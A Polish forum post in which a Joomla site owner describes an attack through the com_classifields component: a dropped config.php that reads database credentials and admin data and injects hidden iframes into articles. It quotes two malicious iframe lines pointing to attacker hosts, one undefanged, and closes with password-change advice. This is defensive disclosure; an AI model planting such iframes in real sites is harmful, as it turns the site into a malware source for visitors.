Witam
Ciągnąc dalej rozpracowanie ataków na Joomla (dotyczy tego postu) gdzie podałem doraźny sposób na zabezpieczenie komponentu com_classifields (wersja 1.3 pl) - dołożyłem do skryptu kod przechwytujący świńskie pliki i właśnie dzisiaj po dłuższej przerwie mój skrypt zadziałał i przechwycił plik config.php wykorzystywany przez włamywacza. Nie będę go publikował (nie jest to szkółka hakerska itp.) ale powiem co robi:
1. Włamywacz uruchamiając swój config.php na naszej stronie wczytuje klasę zawierającą funkcje połączeń do bazy danych,
2. Po inicjalizacji klasy włamywacz odczytuje zawartość naszego pliku configuration.php ładując to co mu trzeba do swoich zmiennych oraz wyświetlając sobie tę konfigurację w oknie swojej przeglądarki!
3. Włamywacz odczytuje z bazy nagłówki arytykułów i dokleja do nich swój kod iframe:
Kod:
<iframe src="http://72.21.44.34/~ack/get.php?f=http://www.waszastrona.com/" width=1 height=1 style="visibility:hidden"></iframe>
Wcześniej był stosowany kod wklejany do modułu mod_mainmenu (ten jest rozszyfrowany):
Kod:
<iframe src="http:// z c h x s i k p g z . b i z / d l / a d v 5 2 1 . p h p" height="1" width="1"></iframe>
(wstawiłem spacje, żeby któryś tester nie wrzucił sobie świństwa do kompa.
4. Plik config.php znika sobie, a Wasza strona staje się źródłem trojanów itp.

Jeżeli ktoś miał już taki atak to radzę pozmieniać wszelkie hasła dostępne w configuration.php (czyli hasło bazy danych) oraz hasła użytkowników posiadających uprawnienia administratora joomla (w pliku config.php jest też kod odczytujący dane z tabeli użytkowników joomli.

Pozdrawiam Dudek Artur